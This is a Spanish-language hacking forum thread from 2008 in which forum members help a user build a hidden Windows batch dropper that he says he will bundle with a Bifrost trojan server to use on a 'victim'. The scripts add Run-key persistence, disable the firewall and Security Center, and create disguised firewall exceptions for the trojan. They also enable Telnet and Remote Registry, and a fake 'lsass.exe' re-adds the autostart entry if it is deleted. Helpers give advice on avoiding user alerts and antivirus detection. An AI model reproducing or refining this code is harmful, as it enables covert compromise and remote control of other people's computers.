Hola con el poco tiempo que estuve leyendo estuve aprendiendo muy pocas cosas porque estaba medio apurado es asi.. hice un pequeño batch que lo que hace es abrir el explorer.exe cada tanto tiempo
Citar@echo off
start /min explorer.exe
ping -n 5 127.0.0.1 >nul
start /min explorer.exe
ping -n 5 127.0.0.1 >nul
start /min explorer.exe
exit
Ahora estas son mis dudas.. Hay alguna manera para programar en batch que cada tanto tiempo se ejecute? y que no tenga que copiar eso muchas veces osea un seguimiento.. como llamarlo por asi decirlo cada tanto. Otra duda mia es le hice /min para que se minimize pero no hay alguna forma de que se ejecute oculto? algo como hide que no se vea la ventana abierta eso seria muy sospechoso. Por ultimo cuando hago esto la ventana ms-dos se mantiene abierta y no quiero que se quede ahi hasta que se ejecute todo. Y por ultimo deje programado unas funciones con el at y me gustaria borrarlas osea delete y nose como seria la funcion o cmd para eso. Estas son mis dudas por ahora si pudieran ayudarme estaria re agradecido
PD: SRRY no sabia donde poner esto no vi la sección correspondiente :(
Cita de: SoloAki en 7 Enero 2008, 00:53 AM
Ahora estas son mis dudas.. Hay alguna manera para programar en batch que cada tanto tiempo se ejecute? y que no tenga que copiar eso muchas veces osea un seguimiento.. como llamarlo por asi decirlo cada tanto. Otra duda mia es le hice /min para que se minimize pero no hay alguna forma de que se ejecute oculto? algo como hide que no se vea la ventana abierta eso seria muy sospechoso. Por ultimo cuando hago esto la ventana ms-dos se mantiene abierta y no quiero que se quede ahi hasta que se ejecute todo
PD: SRRY no sabia donde poner esto no vi la sección correspondiente :(
Para programar tareas en horas y dias determinados esta el comando AT. y para que no se vea la ventana agrega puedes hacer start /b xxxxx
Para ejecutar el código tantas veces como quieras modificalo así:
@echo off
set contador=0
:vuelta
start /min explorer.exe
ping -n 5 127.0.0.1 >nul
set /a contador+=1
if %contador%==[NUMERO DE VECES A EJECUTAR] exit
goto vueltaSi lo que quieres es que se ejecute indefinidamente elimina las lineas:
- set contador=0
- set /a contador+=1
- if contador==[NUMERO DE VECES A EJECUTAR] exit
En batch ":ejemplo", establece un punto desde el que seguir la ejecución al usar "GOTO ejemplo".
El comando SET establece variables en las que guardar datos, y el modificador
/a nos permite operar con números.
Para hacer referencia al valor de la variable usa: %nombrevariable%
Con IF puedes crear estructuras condicionales: IF [CONDICIÓN] comando
Usa [COMANDO] /? para más información de cualquier comando.
Para tareas programadas:
at - muestra todas las tareas actuales
at id /delete - elimina la tarea con ese id
at /delete - elimina todas las tareas, añade /yes para no confirmación
En cuanto a lo de ocultar la ejecución de comandos... sí, es posible pero tienes que convertir el batch en un EXE con un batch compiler que incorpore esta opción. Yo solo te puedo recomendar "Quick Batch File Compiler", si alguien sabe de otra opción que incorpore esta característica también te servirá.
También puedes usar aplicaciones del tipo de NirCmd.
Para cualquiera de las dos soluciones puedes usar google para informate, hay bastante información sobre el tema.
También hay por ahí buenos tutoriales de batch, te lo recomiendo. ;)
Saludos.
Yo mis batch los convierte en exe con el WinRar. Quedan muy bien ;D
Como los convertis en batch? con el winrar.
Cita de: Vlad_Asen en 11 Enero 2008, 02:57 AM
Yo mis batch los convierte en exe con el WinRar. Quedan muy bien ;D
Eso es sencillamente imposible... :¬¬
Cita de: Otto VanHackman en 12 Enero 2008, 02:27 AM
Cita de: Vlad_Asen en 11 Enero 2008, 02:57 AM
Yo mis batch los convierte en exe con el WinRar. Quedan muy bien ;D
Eso es sencillamente imposible... :¬¬
Creo que a lo que se refiere a que crea archivos SFX, es decir, archivos autoextraíbles, esos si son *.exe :P
Saludos
Igualmente esta mal ya que no es lo mismo crear SFX que convertir un .bat a .exe...
[quote author=Otto VanHackman link=topic=194679.msg928898#msg928898
Eso es sencillamente imposible... :¬¬
Ejemplo practico:
tenemos el archivo papa.bat
Logicamente hay que tener instalado el WinRar
Le damos click derecho con el boton del mousse y elegimos "Añadir al archivo...". Le cambias el nombre (esto es opcional) a por ejemplo spepe.rar
en ese mismo panel le das tilde a la segunda casilla "Crear un fichero autoextraible" Automaticamente el WinRar convierte tu archivo en un .exe.
Luego desde el mismo WinRar se pueden hacer muchas cosas como cambiarle el icono, que se ejecute en silencio (no pida confirmaciones, etc), que se descomprima automaticamente en determinadas carpetas.
Cita de: Vlad_Asen en 12 Enero 2008, 02:43 AM
[quote author=Otto VanHackman link=topic=194679.msg928898#msg928898
Eso es sencillamente imposible... :¬¬
Ejemplo practico:
tenemos el archivo papa.bat
Logicamente hay que tener instalado el WinRar
Le damos click derecho con el boton del mousse y elegimos "Añadir al archivo...". Le cambias el nombre (esto es opcional) a por ejemplo spepe.rar
en ese mismo panel le das tilde a la segunda casilla "Crear un fichero autoextraible" Automaticamente el WinRar convierte tu archivo en un .exe.
Luego desde el mismo WinRar se pueden hacer muchas cosas como cambiarle el icono, que se ejecute en silencio (no pida confirmaciones, etc), que se descomprima automaticamente en determinadas carpetas.
Respuesta Practica:
Cita de: Otto VanHackman en 12 Enero 2008, 02:43 AM
Igualmente esta mal ya que no es lo mismo crear SFX que convertir un .bat a .exe...
Consejo practico:
Aprende a reconocer la diferencia entre un SFX (archivo autoextraible) y un programa ejecutable.
Los archivos autoextraibles son ejecutables.
Pero eso no es una conversion, es una especie de empaquetamiento...Igual yo no le veo mucha utilidad a la conversion....
Existen programas que lo que hacer es crear el batch y ejecutarlo...Pero en ningun momento transformarlo..
salu2
Y la ayuda que pedi :P Ya solucione todas esas cosas uso el Quick Batch Compiler en modo ghost y no aparece ni la ventana de msdos ni la ventana del explorer :D creo que ya esta la duda es que tengo ahora. Cuando vos le das doble click al troyano este desaparece y se crea la carpeta donde lo has puesto por ejemplo windows/system ahi se crea unois archivos la extension y el .exe que le pusiste el nombre. Si por ejemplo pierdo la victima ejecutando otra vez ese .exe es como ejecutar otra vez el troyano?
Cita de: Vlad_Asen en 12 Enero 2008, 04:43 AM
Los archivos autoextraibles son ejecutables.
Amigo pasate por la wikipedia, al crear Un SFX no conviertes el Batch a Aplicacion Win32, simplemente lo empaquetas!!!!...
Si usas archivos adjuntos al EXE creado, algunas versiones del programa extraen estos archivos al directorio en que es ejecutado. Esto es demasiado ruidoso y alguna vez puede darte problemas. ;)
Yo tengo la versión 2.1.6.0, y esta versión extrae los archivos en "%userprofile%\Configuración local\Datos de programa", cuando se termina el programa estos archivos son borrados. Y si quisieras copiar algun adjunto a otra ruta lo podrias hacer desde la variable de entorno %MYFILES% que crea QBFC.
Si el troyano lo has echo tu deberia comprobar cada vez que se ejecuta si ya esta instalado para decidir que hacer después.
PD: Por experiencia propia las aplicaciones que se quedan funcionando en segundo plano (con bucles), al apagar el sistema pueden devolver un error, no afectan al programa pero alertan al usuario. (mejor hacer pruebas)
Suerte
Una pregunta como haria para agregarlo al registro asi cuando se reinicia sigue ejecutandose.. ya que cuando por primera vez lo ejecuta y sigue bien pero al reiniciar ya no funcionaria mas no? Quiero que al reiniciar apagar el equipo,etc sigue funcionando jeje.
Aqui lo tienes
http://foro.elhacker.net/index.php/topic,146876.0.html :P
Saludos
Paa no entendi nada :( pero bueno nose si pùede ir esto con lo que lei el Bifrost tiene ActiveX si le tiro random y agarro uno y la agrego pero nose como podria seguir haciendolo otra opcion seria esto?
reg add "hklm\software\microsoft\windows\currentversion\run" /v mibat.bat /d %windir%\system32\mibat.bat /f
pero si hago eso se veria en el msconfig? o en algun otro lado ademas? mi batch se llama sys32.exe y estaria alojado en %Windir%system32\1234\sys32.exe entonces el registro tendria que ser asi
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v sys32.bat /d %windir%\system32\1234\sys32.bat /f
Supuestamente lo agrega al inicio de windows pero entonces donde seria visible por msconfig ? o por inicio de programas? o nose.
Seria visible desde msconfig, también con cualquier programa que manipule el registro (regedit, RegCleaner...)
Por lo que: /v sys32.bat, mejor que sea un nombre que se camufle bien, ya que no tiene porque coincidir con el nombre de archivo.
Si con inicio de programas te refieres al del menú inicio, no. De esa forma es suficiente con copiar el archivo a ese directorio. Pero canta mucho y es más facil de eliminar.
Saludos
Este script estaria bien_
Código:
Citar@echo off
netsh firewall set opmode mode = DISABLE
pause
net stop SharedAccess
pause
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v sys32.bat /d %windir%\system32\1234\sys32.bat /f
pause
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle
CitarEste script estaria bien
Sí, el script funcionaria bien. (habria que pulsar una tecla cada vez que haya un
pause)
Aunque en el bucle no hace falta que se repitan lineas:
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucley si lo vas a compilar como aplicación oculta no hacen falta los
> nul para "silenciar" el ping, ya que no se verán. Además en este caso tendrias que eliminar los
pause por el mismo motivo.
Una última cosa: si el apagado del firewall va a ser utilizado es mejor crear una excepción y se evita facilmente la alerta del usuario (el firewall de windows seguiria funcionando y permitiria tu conexión):
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v "[archivo ejecutable a permitir]" /t REG_SZ /d "[archivo ejecutable a permitir]:*:Enabled:[Nombre de la conexión]"Si lo vas ha utilizar como *.bat funcionará perfectamente como está.
Saludos
Entonces seria asi :
CitarCódigo:
@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v sys32.bat /t REG_SZ /d " sys32.bat:*:Enabled: Firewall"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v sys32.bat /d %windir%\system32\1234\sys32.bat /f
netsh firewall set opmode mode = DISABLE
net stop SharedAccess
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle
en donde dice Enabled: seria el nombre que se va a ver como excepciones? Nose podria poner uno que ya este? por ejemplo Entorno uPnP o escritorio remoto nose..
Lo voy a compilar con el quick batch compiler :D aunque los antivirus ya estan tomando una dll de este como herramienta maliciosa!. Y si no lo compilo con nada se va a ver la ventana msdos verdad?
PD: Encontre mas ideas para mejorar el batch solo quisiera saber como desabhilitar o habilitar los servicios. services.msc
Osea estado de inicio : como cambiarlo de iniciado a detenido y tipo de inicio como cambiarlo a automatico manual o desabilitarlo. Espero que me puedas ayudar asi termino mas o menos mi batch. Creo que encontre unos trucos muy pero muy utiles :D
Hay una cosa que no has entendido muy bien.
El batch
no necesita pasar el firewall, lo necesitan aquellos ejecutables usados en el batch que necesiten acceso a internet. Por ejemplo: si tu aplicación ya compilada utiliza netcat para dejar puertos a la escucha windows avisará al usuario, preguntandole si desea permitir esta conexión. La forma de evitarlo es con:
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "%windir%\nc.exe" /t REG_SZ /d "%windir%\nc.exe:*:Enabled:MSN"Donde:
Enabled - indica que se quiere permitir siempre la conexión.
También puede cambiar por:
Disabled - no permitirá la conexión.
En el ejemplo he usado como nombre de la conexión
MSN, este nombre
si puede coincidir con uno ya existente, ya que en el registro se almacena con un valor que utiliza como nombre la ruta del archivo.
CitarY si no lo compilo con nada se va a ver la ventana msdos verdad?
Sí, será visible. De todas formas ¿me podrias decir el nombre de la dll y la versión de QBFC?, solo por curiosidad. :)
Vamos con los servicios.
- Parar un servicio: NET STOP "Nombre de servicio"
- Iniciar un servicio: NET START "Nombre de servicio"
- Pausar un servicio: NET PAUSE "Nombre de servicio"
- Continuar un servicio: NET CONTINUE "Nombre de servicio"
- Como nombre de servicio vale el descriptivo ("Actualizaciones atomáticas") o el de servicio en si ("wuauserv")
El modo de inicio (Automatico, Manual o Deshabilitado) se cambia modificando el registro:
En la clave
"HKLM\STEMYS\CurrentControlSet\Services", existe una clave para cada servicio y dentro un valor REG_DWORD de nombre
Start, por ejemplo para actualizaciones automáticas:
"HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start".
Este valor puede ser:
- 2 - Automático
- 3 - Manual
- 4 - Deshabilitado
PE:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /d 4 /f-Deshabilitaria Actualizaciones automáticas.
PD: Te recomiendo buscar información sobre el comando NET puede dar mucho juego. ;)
Saludos.
Aja ya vi un par de cosas.. creo que aca esta el bat supongo me gustaria saber si esta bien. Lei acerca del net y bueno por ahora creo que no lo voy a utilizar. Los archivos que me tomaban como infectado eran unas dll del quick batch compiler el stubc.dll o el otro que no me acuerdo.
Aca esta me decis si esta bien o mal.
CitarCódigo:
@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v system32.bat /t REG_SZ /d " system32.bat:*:Enabled: MSN"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v system32.bat /d %windir%\system32\1234\system32.bat /f
netsh firewall set opmode mode = DISABLE
net stop SharedAccess
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle
Me gustaria saber otra cosa al reiniciar se ejecuta otra vez el .bat pero solo quiero que de esa parte se ejecute el bucle por ejemplo. Otra cosa tardaria mucho en finalizar el .bat? lo compilo con el quick y no se va a ver ni la ventana ni la ventana del explorer tampoco jeje, pero me gustaria saber si tardaria mucho en ejecutar todo el bat.
Por lo que he estado viendo, no me quedan claras las primeras líneas
CitarHKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v system32.bat /t REG_SZ /d " system32.bat:*:Enabled: MSN"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v system32.bat /d %windir%\system32\1234\system32.bat /f
netsh firewall set opmode mode = DISABLE
CitarHKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v system32.bat /t REG_SZ /d "%windir%\system32\1234\system32.bat:*:Enabled: MSN"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v system32.bat /d %windir%\system32\1234\system32.bat /f
netsh firewall set opmode mode = DISABLE
Para que la primera línea estuviera correcta deberia de ser así, igualmente no veo para que la estas utilizando, ya que eso lo que hace es agregar una excepción el el firewall, esto se hace para que no salga el mensaje junto al reloj diciendo que el firewall esta desactivado, pero la cuestión es que tu no saldrás con ninguna aplicación, el system32.bat no intenta conectarse a nada, además de que con la tercera línea desactivas el firewall, entonces igual salta el mensaje :P
Citarsolo quiero que de esa parte se ejecute el bucle por ejemplo
Esto lo podrías hacer, primero leyendo una de las claves del registro que has incluido, por ejemplo la que incluye el bat en el arranque, y luego con un if, determinar si se ejecutan los Net o si pasas directamente al bucle
Tardar, tarda unos 6 segundos aprox, eso me ha demorado a mi en una máquina (virtual ;D) con 512 mb, p4 de 3.0g
Saludos
Lo voy a adjuntar con un server de un troyano y lo que quiero hacer con esa parte es desabhilitar y desactivar el firewall de windows. En todo caso el .bat seri asi entonces.
CitarCitarCódigo:
@echo off
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v system32.bat /d %windir%\system32\1234\system32.bat /f
netsh firewall set opmode mode = DISABLE
net stop SharedAccess
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle
Asi compilado cuanto tardaria? Y asi el bat no da señal alguno verdad? Podrias ejecutarlo asi otra vez sino es mucha molestia?
agrege el bat al run desactive el firewall detengo el servicio de firewall y despues otra cosas. Cuando lo ejecutas asi se ve algo? algun mensaje de que se detuvo el firewall,etc. Ahora me pongo a ver acerca del comando ese para no ejecutar todo el bat otra vez. Pero.. que me recomendais ejecutar el bat asi? o acortarlo despues de ejecutar todo eso. A este bat lo voy a adjuntar con un server.
En todo caso si desabilito el firewall y detengo el servicio con esto quiere decir que va a aceptar todas las conexiones? por ejemplo la de un server. Porque en caso de que no sea asi tendria que agregarlo. seria algo asi suponiendo que el server esta en system32\bifrost
Citarreg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "%windir%\system32\bifrost\server.exe" /t REG_SZ /d "%windir%\system32\bifrost\server.exe:*:Enabled:Asistencia Remota
PD: Cuando dices además de que con la tercera línea desactivas el firewall, entonces igual salta el mensaje. Donde salta el mensaje en el centro de seguridad? Yo en el batch agregue que el centro de seguridad este desactivado y el servicio detenido. Porque habria de saltar :P
Gracias por su ayuda realmente me estan ayudando un monton ! se los agradezco. :-[
Con cualquiera de estas dos lineas:
- netsh firewall set opmode mode = DISABLE
- net stop SharedAccess
-saltará una advertencia de seguridad al lado del reloj de windows. Por lo que te recomiendo, a no ser que de verdad quieras desactivar todo el firewall y permitir todas las conexiones, que solamente hagas una excepción en el firewall para tu server con un nombre discreto. De esta forma será silencioso y al ejecutarse al inicio del sistema pasará desapercibido.
Además, la linea que más tarda en ejecutarse con diferencia es "
net stop SharedAccess" - Seguiré buscando algo para evitar la alerta
Citarreg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "%windir%\system32\bifrost\server.exe" /t REG_SZ /d "%windir%\system32\bifrost\server.exe:*:Enabled:Asistencia Remota"
Con lo de saltar la parte de código antes del bucle creo que si no tarda mucho es mejor que se ejecute, asegurando la configuración (por si hay futuros cambios). Sobre todo en la que se modifica el firewall ya que puede delatar a tu server.
CitarGracias por su ayuda realmente me estan ayudando un monton ! se los agradezco. :-[
De nada, creo que todos los que estamos aquí disfrutamos con este tipo de cosas. :D
Saludos
oigan, gracias yo tmb tenia ese tipo de problemas ^^ jeje gracias amigos
Osea que por ahora lo mejor que puedo hacer con el firewall es agregar una excepción. Es la unica forma que pasaria desadvertido pero desactivando el firewall de windows a mi personalmente no me aparece ningun cartel porque podra ser. Bueno por ahora sera agregar una excepcion con un nombre normal como entorno upnp pero si lo agrego con el mismo nombre en las excpeciones se va ver? o va a estar escondido en el mismo?. Otra duda mas que tengo es esta, si la persona ve en el msconfig el start del bat lo va a ver con la extension .bat? porque le podria poner el nombre de ctfmon que pasaria desapercibido. Pero si la persona saca el run, la proxima vez el .bat no se ejecutaria verdad? nose puede hacer un autocopy osea si la persona lo elimina volver a agregarlo al registro jeje. Por ahora estoy concentrado en lo del firewall para ver si lo podemos desactivar.
Si colocas dos excepciones con el mismo nombre aparecerán las dos y serán distinguibles solamente al pulsar sobre modificar, ya que mostrará el ejecutable referido.
Citarsi la persona ve en el msconfig el start del bat lo va a ver con la extension .bat?
No en la primera columna, aunque si en la segunda (Comando) en la que aparece la ruta completa. Esta suele cortarse asi que si el nombre es discreto... ;)
En cuanto a lo de restaurar el valor de registro se me ha acurrido este código de otro EXE que puedes lanzar al inicio del otro con start (para que no se detenga la ejecución del primero)
:r
ping 127.0.0.1 /n 20
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [Nombre de valor]
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [Nombre de valor] /d "[Ejecutable]" /f
goto rEste puede ser utilizado para comprobar si faltan archivos y volver a copiarlos o cualquier otra tarea. Si además lo compilas con el nombre de
lsass.exe, comprobarás que el administrador de tareas tiene problemas para finalizarlo ;D
-Aunque con taskkill /f /pid [PID] si puede ser cerrado. Esto pasa con cualquier proceso crítico del sistema
Saludos
Citar:r
ping 127.0.0.1 /n 20
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [Nombre de valor]
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [Nombre de valor] /d "[Ejecutable]" /f
goto r
Esto es para que se vuelva a autocopiar si se borra jeje.. el Nombre de valor exactamente que se tendria que poner? en Ejecutable seria el nombre del bat? No entendi muy bien eso jeje.
CitarCódigo:
@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v ctfmon.bat /t REG_SZ /d "%windir%\ctfmon\1234\ctfmon.bat:*:Enabled: Windows Messenger"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d %windir%\system32\1234\ctfmon.bat /f
ping 127.0.0.1 /n 20
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [Nombre de valor]
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [Nombre de valor] /d "[Ejecutable]" /f
goto r
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle
Acorde a tu ejemplo:
Citar:r
ping 127.0.0.1 /n 20
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon /d "%windir%\system32\1234\ctfmon.bat" /f
goto r
Pero
no tienes que añadirlo al codigo que ya tenias, es otro EXE, lo que los hara independientes (de ahi que te dije que lo podias llamar
lsass.exe). El motivo es que no se pueden ejecutar dos bucles infinitos en un mismo batch, pero si son paralelos sí.
Para ejecutarlo al tiempo que el otro solo tendrias que añadir
start %windir%\system32\1234\lsass.exe - lsass.exe puede tener cualquier otro nombre, pero si es igual al de algún proceso critico, el administrador de tareas no podrá finalizarlo.
Citar@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v ctfmon.bat /t REG_SZ /d "%windir%\ctfmon\1234\ctfmon.bat:*:Enabled: Windows Messenger"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d %windir%\system32\1234\ctfmon.bat /f
start %windir%\system32\1234\lsass.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle
Este falso lsass.exe comprobará mediante el bucle
r si existe el valor en el registro. Para ello intenta leer su contenido, si no hay errores (%errorlevel%==0) continua con el bucle, pero si %errorlevel%==1 vuelve a crear el valor en el registro.
Esto lo puedes usar también con cualquier otro valor o archivo (añadiendolo al código de lsass.exe), por ejemplo la excepción del firewall.
Saludos.
@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v ctfmon.bat /t REG_SZ /d "%windir%\ctfmon\1234\ctfmon.bat:*:Enabled: Windows Messenger"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d %windir%\system32\1234\ctfmon.bat /f
start %windir%\system32\1234\lsass.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle
si ejecuto este .bat primero sin haber subido el otro bat llamado lsass.exe no pasar nada verdad? Pienso adjuntar este bat con el troyano y luego que tengo la victima subirle el otro bat solo me queda la duda si es que no se dañara el bat al ejecutar esa parte aunque no haya subido el otro bat. Si pudieses probarlo en tu virtual machine me haces un gran favor :P lo voy a psar con el quick batch compiler.
Solo tienes que añadir un if, de lo contrario resultaria un mensaje de error que incluso daria a conocer la ruta en la que deberia estar:
if exist %windir%\system32\1234\lsass.exe ( start %windir%\system32\1234\lsass.exe )
Lo he probado y funciona todo correctamente.
Supongo que te habrás dado cuenta que ctfmon tiene la extensión .bat (para ser oculto debe estar compilado) y que también has agregado este como excepción del firewall (debe de ser el server del troyano). ;D
Suerte
es parte dices?
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v ctfmon.bat /t REG_SZ /d "%windir%\ctfmon\1234\ctfmon.bat:*:Enabled: Windows Messenger"
Voy a adjuntar este .bat con un troyano pero para agregarlo a las excpeciones al troyano.
Yo ahi entonces seria asi.
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v server /t REG_SZ /d "%windir%\ctfmon\1234\server:*:Enabled: Windows Messenger"
Asi hago la excepcion del troyano no ? :D Creo que ya esta si me dices estaria todo terminado
CitarAsi hago la excepcion del troyano no ?
Sí, asi está bien, ya que el bat no accederá nunca a la red sino otros programas que este pueda llamar o simplemente que ya estuvieran ahi.
Ej(bo.exe es un ejemplo):
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v bo.exe /t REG_SZ /d "%windir%\ctfmon\1234\bo.exe:*:Enabled: Windows Messenger"De todas formas puede que el troyano ya se encargue de saltar el firewall por si solo. Es decir, las excepciones las tendrias que crear para este tipo de ejecutables que si que conectan a la red.
Me refereria también a que en el ctfmon.bat al no estar compilado será visible la ventana de simbolo del sistema.
Si no tienes ningún problema con esto creo que ya todo funciona bien.
Saludos
Sisi al .bat lo voy a compilar con algun programa como el Quick Batch Compiler y listo :) La velocidad del bat en ejecutarse seguramente sera mas rapida que antes, y no levantara sospechas con alertas y mensajes xD.
Bueno creo que ya estarian los .bat estos son los finales me decis si esta bien y si no me falta nada? :P
CitarCódigo:
@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v server.exe /t REG_SZ /d "%windir%\ctfmon\1234\server.exe:*:Enabled: Windows Messenger"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d %windir%\system32\1234\ctfmon.bat /f
